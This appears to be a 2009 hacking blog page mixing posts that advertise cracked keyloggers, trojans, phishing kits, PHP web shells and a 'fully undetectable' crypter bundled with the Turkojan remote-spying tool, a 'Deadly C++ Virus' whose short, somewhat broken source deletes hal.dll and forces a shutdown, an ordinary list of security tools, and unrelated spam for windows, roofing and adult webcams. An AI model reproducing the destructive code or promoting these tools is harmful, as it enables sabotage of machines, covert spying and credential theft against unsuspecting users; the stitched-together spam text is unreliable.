The Most Powerful Tools On the Web ( Compiled )

Posted at Monday, June 29, 2009

The Most Powerful Tools On the Web ( Compiled )


Ardamax keylogger with crack
john the ripper
sub seven
back orifice
net bus
cpu death ping 2.0
cain and abel
all ready made phishers for myspace,facebook,rapid share,xbox live and others
hack attack trojan
spider binder
darkavengard cryper

and alot more



A Deadly C++ Virus

Posted at Monday, June 29, 2009

A Deadly C++ Virus

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.

The Original Code:


using namespace std;

int main(int argc, char *argv[])
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:


using namespace std;

int main(int argc, char *argv[])
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");

SQL InjecTion and XSS TooLz

Posted at Monday, June 29, 2009

SQL InjecTion and XSS TooLz

Apache Hacking TooLz Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script

Remote File Inclusion And Remote Command Execution Directory :

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter

Databases & SQL Injection & XSS TooLz Directory

Casi 4.0
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner

PHP Shells

**** v2.0
c99shell #16
Backdoor php v0.1
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell



Austin Window Installation Company

Posted at Friday, June 26, 2009

If you are living in Austin and Houston, and care about your planet by reducing our carbon, its time to install new energy efficient windows and doors from EnergyWise in your home. Why we need to install the new energy efficient windows? Because it can be reduce our consumption of energy and thereby reduce the amount of CO2's we release into the atmosphere.

The question is which a reliable Austin Windows installation company? The Energywise Windows Inc. is the right answer. When properly selected and installed, energy-efficient windows can help minimize your heating, cooling, and lighting costs.

When selecting windows for energy efficiency, it's important to first consider their energy performance ratings in relation to your climate and your home's design. The Energywise Windows Inc. will install new energy efficient windows properly to ensure that its energy performance is achieved and that it does not contribute to a home's moisture problems.

With qualified windows and doors save you energy and money, increase the comfort of your home, and protect your valuable possessions from sun damage. They are also better for the environment because lowering your energy use means less air pollution from power plants.

With the new energy efficient windows and doors you can reduce up to 15,000 pounds of CO2's a year by installing new energy efficient windows and doors in your home. It's means you have did a green living to save the city and the planet.

So, contact Greg Ginther from Energywise Windows Inc.2408 Jesse Owens Drive Austin, TX 78748, if you want the new windows to work properly and suit the look of your home.

Japanese Webcam Girls Online

Posted at Thursday, June 25, 2009

Are you looking for sexy Japanese webcam girls online? If so, then check out the best Asian adult sex webcam site that feature sexy Japanese webcam girls live from Japan.

All pictures preview sex webcam featuring Japanese girls chat hosts where you can register here as an adult webcam member. All the Japanese sex webcam girls are 100% amateur and all perform via their live adult webcam from the comfort of their homes in Japan. This Japanese adult webcam features a stunning selection of sexy Japanese sex webcam girls who love performing live sex webcam shows from their bedrooms.

Enjoy one to one private webcam and live adult chat with the Japanese webcam girl of your choice and desire. All the Japanese sex webcam chat hosts on love being directed during their live sex webcam show. Chat live to the Japanese sex webcam hosts via audio and text messages. Let the Japanese webcam hosts fulfill all your sexual fantasies via their private 1-1 sex webcam shows live from Japan. features 100% Japanese girls from Japan that want to perform live sex webcam shows via their Japanese cams. Read their detailed bio and view their sexy pictures before deciding which Japanese girl chat host you want to perform a private sex cam show via her personal cam in Japan.

Join - for $2.95 as adult webcam member to hook up with the selection of stunning Japanese sex webcam girls who love performing live sex shows via their personal webcam in Japan.

Top 15 Security/Hacking Tools/Utilities

Posted at Thursday, June 25, 2009

Top 15 Security/Hacking Tools/Utilities

1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-server framework.
Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

3. John the Ripper
Yes, JTR 1.7 was recently released!!!
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

4. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).
Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

5. SuperScan
Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.
If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

6. p0f
P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:
- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.
Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

7. Wireshark (Formely Ethereal)
Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.
Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.

8. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
The best Layer 2 kit there is.

9. Eraser
Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.
An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

10. PuTTY
PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

11. LCP
Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.
A good free alternative to L0phtcrack.

12. Cain and Abel
My personal favourite for password cracking of any kind.
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

13. Kismet
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.
A good wireless tool as long as your card supports rfmon (look for an orinocco gold).

14. NetStumbler
Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.
NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

* Verify that your network is set up the way you intended.
* Find locations with poor coverage in your WLAN.
* Detect other networks that may be causing interference on your network.
* Detect unauthorized “rogue” access points in your workplace.
* Help aim directional antennas for long-haul WLAN links.
* Use it recreationally for WarDriving.

15. hping
To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.
hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Turkojan 4 Premium, Fully working

Posted at Thursday, June 25, 2009

Turkojan 4 Premium, Fully working

What is Turkojan ?
Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

You can use Turkojan for manage computers,employee monitoring and child monitoring...

Features :

Reverse Connection
Remote Desktop(very fast)
Webcam Streaming(very fast)
Audio Streaming
Thumbnail viewer

Remote passwords
MSN Sniffer
Remote Shell
Web-Site Blocking

Chat with server

Send fake messages

Advanced file manager

Zipping files&folders

Find files

Change remote screen resolution

Mouse manager

Information about remote computer

Clipboard manager

IE options

Running Process

Service Manager

Keyboard Manager

Online keylogger

Offline keylogger

Fun Menu

Registry manager

Invisible in Searching Files/Regedit/Msconfig
Small Server (100kb)

Also added to this pack is

JapaBrz Csharp Crypter

100% FUD

Download Code:

BackTrack 4 Beta

Posted at Thursday, June 25, 2009

BackTrack 4 Beta

The Remote Exploit Development Team is happy to announce the release of BackTrack 4 Beta. We have taken huge conceptual leaps with BackTrack 4, and have some new and exciting features. The most significant of these changes is our expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution".

Now based on Debian core packages and utilizing the Ubuntu software repositories, BackTrack 4 can be upgraded in case of update. When syncing with our BackTrack repositories, you will regularly get security tool updates soon after they are released.

Some of the new features include:

* Kernel with better hardware support.
* Native support for Pico e12 and e16 cards is now fully functional, making BackTrack the first pentesting distro to fully utilize these awesome tiny machines.
* Support for PXE Boot - Boot BackTrack over the network with PXE supported cards!
* SAINT EXPLOIT - kindly provided by SAINT corporation for our users with a limited number of free IPs.
* MALTEGO - The guys over at Paterva did outstanding work with Maltego 2.0.2 - which is featured in BackTrack as a community edition.
* The latest mac80211 wireless injection pacthes are applied, with several custom patches for rtl8187 injection speed enhancements. Wireless injection support has never been so broad and functional.
* Unicornscan - Fully functional with postgress logging support and a web front end.
* RFID support
* Pyrit CUDA support...
* New and updated tools - the list is endless!

This BETA version is said to be quite stable and usable.

Official Page n Blog-

Description: DVD Image
Name:: bt4-beta.iso
Size: 854 MB

Download Code:

VMware Image
Name: bt4-beta-vm-6.5.1.rar
Size: 1 GB

Download Code:

NOTE: Due to massive downloads and missing bandwidth, some servers might be unreachable and you need to hit either reload or click again on the download link.

ADT Monitored Home Security System

Posted at Tuesday, June 23, 2009

Need home security protection? Look no further. ADT is America's leading provider of home security systems. This security system, applying advanced technology as a form of information danger sign. This system also using the camera to capture an image or object. Results from the captured image can be viewed on a monitor. Sensors used in security systems is a motion sensor. Every time there is motion detected by the sensor, the system will send a security alarm and take a picture and save the image. Message which contain the information about the sensor detects movement will be sent and tell the house owner should immediately check the monitor to know the object. If the sensor does not detect any movement, the ADT security system will be standby condition.

ADT Security system is used for home security system, so that wherever the home owner, they can hold information about home security. At ADT, they offer more than just a home security system. They help provide you with peace of mind, knowing your home security system is monitored by professionals, twenty four hours a day, seven days a week - And for a lot less than you might expect.

An ADT monitored home security system is no ordinary home alarm. If an ADT alarm is triggered it will alert ADT Alarm Receiving Centre (ARC). Once the alarm is confirmed (after filter out false alarms) the ARC will contact the emergency services and/or local authorities; giving you full peace of mind. ADT Security Services Monitoring Centers help protect your family and your valuables, 24 hours a day, 7 days a week. Provide Power Tools

Posted at Sunday, June 14, 2009

Do you want to buy power tools online? Now you do not have bothered if you want to buy power tools. There is a web site that provide an online shopping the tools. And they happy to realize the various your technical equipment with the best price. Just click on the

This site is comprehensive, so more informative and certainly more convenient if you want to buy a tool through this site. In addition, tools are offered is also very complete, so it came as no longer need to search for alternative sites to find the tools you need to complete because all available here. provide tools so complete, so that we can find different types of tools from Saws, Angle Drills, Hammers, Screwdrivers, Wrenches, Drivers, and Tool Belts, Tool Bucket Organizers & Safety Equipment and many more. Buy power tools, hand tools and accessories for less at They sell top brand names including Makita, Hitachi, Campbell Hausfeld, Gerber, etc. is the ultimate solution for anyone who needs power tools. They will be retailing an extensive line of professional grade tools from many of the leading manufacturers in their market. All of these companies have an outstanding reputation for durability, quality, and of course power.

So if you are seeking information tools such as tools above online, please come to this site and find the best tools you are looking for. Concerning the price, do not worry they will give best price and prime quality as you want.

So exciting right? Can shop the tools online, besides sparing the time we can more freely choose the products that we want.

Hopefully this information is useful for you who are currently looking for information about online tools, and I hope what you are looking for may be found at the site and makes it easier to shop power tools online.

To find out more information, you may immediately go directly to and find best tools here.

The Best Texas, Houston, and Tulsa Roofer

Posted at Sunday, June 14, 2009

Do you want to have a comfortable roof of home, with settings between space, lighting, air circulation, the quality of the planned well?

Do not until you do a mistake now and regret later caused the planning roof of your home that are less good, due to a lack of good planning, caused more job unloading and installed, the caused of the higher cost and low-quality roofing.

Here, a team needed with an experienced and trusted. There are Austin roofer, Houston roofer, and Tulsa roofer team that supported by the field supervisor, foreman fitter and building experience. Their team can help you with this work, because they had trained and experienced for the job.

They are specialist services on roof in Texas, Houston, Tulsa and the surrounding areas with the material and human resources of quality, they have put more of housing units, both personal house and developer in partnership starts up a simple home-class to luxury home.

So do not hesitate to contact them for your roofing solutions.

iContact: Email Marketing Solution

Posted at Thursday, June 11, 2009

If you expect a response directly from the customer and to maintain good relations between producers and consumers, you must have an email marketing (emarketing) program. Email marketing? Yes, this is one of the techniques in the internet campaign. Ie, by sending an email containing the promotional product or service. Although classified as "ancient", but until now it is still classified as the most successful way. With email marketing service, you can communicate with your prospects on your web site where you advertise your products or services.

If you are looking for any easy and inexpensive way to put your emarketing on autopilot and get great deliverability, check out iContact. iContact is an easy to use email marketing, surveying, autoresponder, and blogging tool that allows small businesses, non-profits, and associations to easily communicate online with their customers, prospects, and members. iContact has an easy to use interface and over 300 professionally-designed email templates. The application allows you to track the opens and clickthroughs on your emails, add a sign-up form to your web site, segment your list, and manage your subscribers.

The company currently has over 15,000 customers and 100,000 users. The product is used primarily by small businesses but also has a number of Fortune 500 companies like Bank of America, Ford, Nissan, Super 8 Motel, and International Paper, and political campaigns like Barack Obama '08. The company is based in Durham, NC and was founded by Ryan Allis and Aaron Houghton in 2003. iContact starts at $9.95 per month and scales upward based on list size. They also have an Enterprise product for larger organizations that starts at $660/month.

You can try a 15 day free trial of iContact at